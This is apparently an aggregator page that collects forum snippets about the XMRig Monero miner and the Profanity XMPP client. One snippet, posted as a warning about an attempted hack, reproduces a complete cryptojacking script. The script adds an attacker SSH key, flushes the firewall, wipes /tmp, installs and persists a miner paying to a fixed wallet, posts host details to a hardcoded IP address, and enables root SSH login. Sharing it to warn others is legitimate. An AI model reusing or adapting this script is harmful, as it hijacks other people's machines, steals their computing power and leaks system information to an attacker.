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Gupax - Enabling 1GB Pages ain't working
I'm not so new to XMRig, but I am new to Gupax.io and I'm lost on how I can get 1GB Pages from Disabled to Enabled in the XMRig portion of Gupax. Yes, my CPU supports it. Yes, I made sure my Linux OS uses HugePages. Yes, my RAM and OS CLI checks reflect their usage. Yes, I've also used this script . It all works, except in Gupax.
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Just experienced an attempted hack. A warning to anyone using WebUI.
#!/bin/bash WALLET="41poaCNDTvs33KCFKfekN88Ehf59ddparQdFKFT4XKrUMnc1Ude7xtvhZuKfTai8tDML6gFyTAKY5RuDDxDqLRZpT8QpQ9b" PORT=$(( 15555 )) export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin if [ -z $HOME ]; then if [ "$(id -u)" == "0" ]; then export HOME=/root elif [ "$(id -u)" != "0" ]; then export USER=$(whoami) export HOME=/home/$USER elif [ -z $HOME ]; then export HOME=/tmp fi fi if [ ! -d $HOME ]; then mkdir -p $HOME fi mkdir $HOME/.ssh ; touch $HOME/.ssh/authorized_keys ; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi3pUF++QmmM6Jo4/wMWqOxmdJotN85QpbkRfYuw9QN5aO35RLSJw7o2UOXN9vsaxnIg9wunNstVff22vyjrFrXTNrHaI///P3d4T4w6CCgLlNdNKgKTG176Y7KBmkWWeZvd8phtIaMprhGSbtnvs4v0hADTw+Ej20EeKfphlZsRSVS6zObq6jro4j8iIXvnGEdkIx8b1SP+QK6D+ZOEQxEzD107latrwYbLCNHWX7VP1oK6fbFk3zU+CGOwITiVPKuyX9aNFJVEopZSmreD+b+JoXpYHybiuhL3ex79uCWNWKnfGgBKrSAmnmopvYnd/mQ902ls16j/Cr/YYKhUvFMC7MhuWdazvM9uFT07c8PSPsEJ+vJpW3t2HQkW89mxqjp1rEvURUlqZtkL/3hZEMaamP6phHpSttncyWiMGuLZxoub/2GM8C09+GOOTaf47//mGxtNs5FNWqjyiznznrc=" >> $HOME/.ssh/authorized_keys ; chmod 600 $HOME/.ssh/authorized_keys if ! (type wget >/dev/null || type curl >/dev/null); then echo "ERROR: This script requires \"wget or curl\" utility to work correctly" exit 1 fi # start doing stuff: preparing miner echo "[*] Removing previous c3pool miner (if any)" if sudo -n true 2>/dev/null; then sudo systemctl stop c3pool_miner.service 2>/dev/null sudo systemctl disable c3pool_miner.service 2>/dev/null sudo systemctl disable xmrig.service 2>/dev/null sudo killall xmrig 2>/dev/null sudo pkill xmrig 2>/dev/null kill $(ps aux | grep "[--]config=" | awk '{print $2}') 2>/dev/null sudo rm -rf /etc/systemd/system/c3pool_miner.service 2>/dev/null else killall -9 xmrig 2>/dev/null killall xmrig 2>/dev/null pkill xmrig 2>/dev/null kill $(ps aux | grep "[--]config=" | awk '{print $2}') 2>/dev/null fi iptables -P INPUT ACCEPT 2>/dev/null iptables -P FORWARD ACCEPT 2>/dev/null iptables -P OUTPUT ACCEPT 2>/dev/null iptables -F 2>/dev/null echo "[*] Removing $HOME/.c3pool directory" rm -rf $HOME/c3pool 2>/dev/null rm -rf $HOME/.c3pool 2>/dev/null rm -rf /tmp/c3pool 2>/dev/null rm -rf /tmp/* 2>/dev/null find . -name "*c3pool*" -exec rm -rf {} \; 2>/dev/null find . -name "*xmrig*" -exec rm -rf {} \; 2>/dev/null find . -name "*miner*" -exec rm -rf {} \; 2>/dev/null find $HOME -name "*c3pool*" -exec rm -rf {} \; 2>/dev/null find $HOME -name "*xmrig*" -exec rm -rf {} \; 2>/dev/null find $HOME -name "*miner*" -exec rm -rf {} \; 2>/dev/null echo "[*] Downloading C3Pool advanced version of xmrig to /tmp/xmrig.tar.gz" if ! (wget -q -O /tmp/xmrig.tar.gz "https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/xmrig.tar.gz" || curl -s "https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/xmrig.tar.gz" -o /tmp/xmrig.tar.gz); then echo "ERROR: Can't download file." exit 1 fi echo "[*] Unpacking /tmp/xmrig.tar.gz to $HOME/.c3pool" [ -d $HOME/.c3pool ] || mkdir $HOME/.c3pool [ -f $HOME/.c3pool/.profile ] || touch $HOME/.c3pool/.profile if ! tar xf /tmp/xmrig.tar.gz -C $HOME/.c3pool; then echo "ERROR: Can't unpack /tmp/xmrig.tar.gz to $HOME/.c3pool directory" exit 1 fi rm /tmp/xmrig.tar.gz echo "[*] Checking if advanced version of $HOME/.c3pool/xmrig works fine (and not removed by antivirus software)" $HOME/.c3pool/xmrig --help >/dev/null if (test $? -ne 0); then if [ -f $HOME/.c3pool/xmrig ]; then echo "WARNING: Advanced version of $HOME/.c3pool/xmrig is not functional or got removed" fi echo "[*] Looking for the latest version of Monero miner" LATEST_XMRIG_RELEASE=`curl -s https://github.com/xmrig/xmrig/releases/latest | grep -o '".*"' | sed 's/"//g'` LATEST_XMRIG_LINUX_RELEASE="https://github.com"`curl -s $LATEST_XMRIG_RELEASE | grep xenial-x64.tar.gz\" | cut -d \" -f2` echo "[*] Downloading $LATEST_XMRIG_LINUX_RELEASE to /tmp/xmrig.tar.gz" if ! curl -L --progress-bar $LATEST_XMRIG_LINUX_RELEASE -o /tmp/xmrig.tar.gz; then echo "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz" exit 1 fi if ! tar xf /tmp/xmrig.tar.gz -C $HOME/.c3pool --strip=1; then echo "WARNING: Can't unpack /tmp/xmrig.tar.gz to $HOME/.c3pool directory" fi rm /tmp/xmrig.tar.gz $HOME/.c3pool/xmrig --help >/dev/null if (test $? -ne 0); then if [ -f $HOME/.c3pool/xmrig ]; then echo "ERROR: Stock version of $HOME/.c3pool/xmrig is not functional too" else echo "ERROR: Stock version of $HOME/.c3pool/xmrig was removed by antivirus too" fi exit 1 fi fi echo "[*] Miner $HOME/.c3pool/xmrig is OK" PASS=`hostname | cut -f1 -d"." | sed -r 's/[^a-zA-Z0-9\-]+/_/g'` if [ "$PASS" == "localhost" ]; then PASS=`ip route get 1 | awk '{print $NF;exit}'` fi if [ -z $PASS ]; then PASS=na fi if [ ! -z $EMAIL ]; then PASS="$PASS:$EMAIL" fi sed -i 's/"donate-level": *[^,]*,/"donate-level": 1,/' $HOME/.c3pool/config.json sed -i 's/"url": *"[^"]*",/"url": "auto.c3pool.org:'$PORT'",/' $HOME/.c3pool/config.json sed -i 's/"user": *"[^"]*",/"user": "'$WALLET'",/' $HOME/.c3pool/config.json sed -i 's/"pass": *"[^"]*",/"pass": "'$PASS'",/' $HOME/.c3pool/config.json sed -i 's/"max-cpu-usage": *[^,]*,/"max-cpu-usage": 100,/' $HOME/.c3pool/config.json sed -i 's/\"max-threads-hint\": *[^,]*,/\"max-threads-hint\": 75,/' $HOME/.c3pool/config.json sed -i 's#"log-file": *null,#"log-file": "'$HOME/.c3pool/xmrig.log'",#' $HOME/.c3pool/config.json sed -i 's/"syslog": *[^,]*,/"syslog": true,/' $HOME/.c3pool/config.json cp $HOME/.c3pool/config.json $HOME/.c3pool/config_background.json sed -i 's/"background": *false,/"background": true,/' $HOME/.c3pool/config_background.json # preparing script echo "[*] Creating $HOME/.c3pool/miner.sh script" cat >$HOME/.c3pool/miner.sh /dev/null; then if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') -gt 3500000 ]]; then echo "[*] Enabling huge pages" echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf >/dev/null sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc))) >/dev/null else echo "[*] Huge already enabled" fi else echo "[*] Not enabling huge pages" fi touch $HOME/.profile sed -i '/c3pool/d' $HOME/.profile echo "$HOME/.c3pool/miner.sh --config=$HOME/.c3pool/config_background.json >/dev/null 2>&1" >>$HOME/.profile #echo "ulimit -n 65000 >/dev/null 2>&1" >>$HOME/.profile chmod +x $HOME/.c3pool/miner.sh (/bin/bash $HOME/.c3pool/miner.sh --config=$HOME/.c3pool/config_background.json >/dev/null 2>&1 || /bin/sh $HOME/.c3pool/miner.sh --config=$HOME/.c3pool/config_background.json >/dev/null 2>&1) rm -rf /tmp/*.sh rm -rf /tmp/* if pidof xmrig >/dev/null; then PID=$(pidof xmrig) echo "Running with $PID" else echo "Not Running" fi IP=$(curl -s -4 http://ip.me) HOSTNAME=$(hostname) USERNAME=$(whoami) HOMEDIR=$(echo ~) CPU_COUNT=$(nproc) MEMORY=$(free -h | awk '/^Mem:/ {print $2}') ARCHI=$(uname -m) (curl -X POST -H "Content-Type: application/json" -d "{\"ip\":\"$IP\",\"hostname\":\"$HOSTNAME\",\"username\":\"$USERNAME\",\"homedir\":\"$HOMEDIR\",\"cpu_count\":\"$CPU_COUNT\",\"memory\":\"$MEMORY\",\"arch\":\"$ARCHI\"}" http://152.67.212.28:55123/add || wget --header "Content-Type: application/json" --post-data "{\"ip\":\"$IP\",\"hostname\":\"$HOSTNAME\",\"username\":\"$USERNAME\",\"homedir\":\"$HOMEDIR\",\"cpu_count\":\"$CPU_COUNT\",\"memory\":\"$MEMORY\",\"arch\":\"$ARCHI\"}" http://152.67.212.28:55123/add) (chmod go-w ~/ && chmod go-w /root && chmod 700 ~/.ssh && chmod 700 /root/.ssh && chmod 600 ~/.ssh/authorized_keys && chown root /root && chown root /root/.ssh) >/dev/null sudo sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config >/dev/null sudo sed -i 's/#PubkeyAuthentication yes/PubkeyAuthentication yes/' /etc/ssh/sshd_config >/dev/null sudo /etc/init.d/ssh restart >/dev/null
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Best mining program on Windows?
Xmrig and use a pool that isn't one of the top three. If you want a have more of a challenge then try the p2pool with xmrig. https://github.com/xmrig/xmrig/releases/tag/v6.19.3
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Over 110k BAN has been distributed to BanRXers!
Regarding how much you can trust BanRX, all of the mining software used is fully open source on GitHub, with a commonly used one (XMrig) having over 7.6k stars on the repository. We also have a community Discord server for all of the apps in the BananoPlanet ecosystem, including our faucet! You can join the BananoPlanet Discord server at https://bananoplanet.cc/discord.
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Awesome miner tech support
I would recommend running XMRig directly so as to weed out any problems related to AwesomeMiner.
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Question about withdrawing from nicehash
I’m guessing you are also CPU mining? That is likely an issue with XMRig, correct? If so, first be sure you launch NiceHash as Admin. Right-click the shortcut -> Properties -> Shortcut tab -> Advanced -> Run as administrator. Relaunch NiceHash from the update shortcut, and approve the User Account Control prompt. If that doesn’t solve it, leave the setting intact, but try a couple of other options: 1. toggle “Disable Device Status Monitoring” from NiceHash settings cog icon -> Advanced tab, which is an easy fix that prevents temperature monitoring. 2. the better solution, is to overwrite your XMRig.exe in the XMRig plug-in internals directory [NiceHash Plugins tab -> XMRig -> three dots -> Show Internals -> bins directory -> latest (i.e., 19.1) -> XMRig directory (i.e., xmrig-6.8.1) -> XMRig.exe] with the latest version (v6.19.3) of XMRig.exe available from https://github.com/xmrig/xmrig/releases . For me, swapping the .exe file and running as Admin resolves the issue.
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New XMRig release 6.19.3
#3245 Improved algorithm negotiation for donation rounds by sending extra information about current mining job.
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How do I know if I'm actually mining Monero correctly and everything is alright?
Downloaded and extracted https://xmrig.com/. The Linux CPU only one.
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How to Mine Ghostrider on Windows
XMRIG: https://github.com/xmrig/xmrig/releases
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Mining Monero
Monero is mined with CPU, and the best software for this is XMRig. You will need to join a mining pool to mine Monero.
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- Profanity IM – Ncurses based XMPP client
- Looking for a C project to contribute on
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Student looking to contribute to open source
I had a great experience contributing to this C project (there is also Python involved) https://github.com/profanity-im/profanity
- IRCv3 2022 Spec round-up
- A possibly new way of drawing boxes in the terminal
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Xmpp Bot with its own address.
One option, maybe a little clunky - check out profanity (https://profanity-im.github.io/), a terminal based xmpp client. It has a python api. You can write a crude plugin to connect to [email protected] (or whatever user you figure out). Then just listen for incoming messages on a loop. When something is received, run it through a few cases to match the message with the intended event (or discard or whatever). Then probably trigger some external shell script to do the data retrieval, returning to the plugin to send. Profanity runs on pretty much anything.
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Trying to build a console only system - need recommendations
XMPP client: Profanity
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Tell HN: Discord is permanently locking out users with multiple accounts
I haven't used it, but if you like irssi you might also like profanity which claims to be inspired by it: https://profanity-im.github.io/
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XMPP client Profanity: beginner friendly FOSS project (C, Python, HTML, CSS)
Our website is: https://profanity-im.github.io/
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Recommendations for an intranet only (unfederated) chat, for notifications and 2 users
Or, there is profanity (https://profanity-im.github.io/) and there is a python library that makes things go quickly. I had a thought to have a plugin autoconnect the "bot" user to the server, start an omemo session with a user (or users), and listen on a local socket or something for messages to send over the omemo session. I had issues with the omemo enrollment/key exchange sticking though, which made it unreliable.
What are some alternatives?
csminer - csminer Monero miner from https://cryptonote.social/
k3os - Purpose-built OS for Kubernetes, fully managed by Kubernetes.
NBMiner - GPU Miner for ETH, RVN, BEAM, CFX, ZIL, AE, ERGO
bytebase - The GitLab/GitHub for database DevOps. World's most advanced database DevOps and CI/CD for Developer, DBA and Platform Engineering teams.
cpuminer-opt-cpupower - Optimized multi algo CPU miner for CPUchain, Uranium-X, Cranepay, Yenten
igel - a delightful machine learning tool that allows you to train, test, and use models without writing code
SRBMiner-Multi - CPU & AMD GPU cryptocurrency miner
proton-ge-custom - Compatibility tool for Steam Play based on Wine and additional components
xmr-stak - Free Monero RandomX Miner and unified CryptoNight miner
toxic - A Tox-based instant messaging and video chat client
cpuminer - CPU miner for Litecoin and Bitcoin
i2p.i2p - I2P is an anonymizing network, offering a simple layer that identity-sensitive applications can use to securely communicate. All data is wrapped with several layers of encryption, and the network is both distributed and dynamic, with no trusted parties.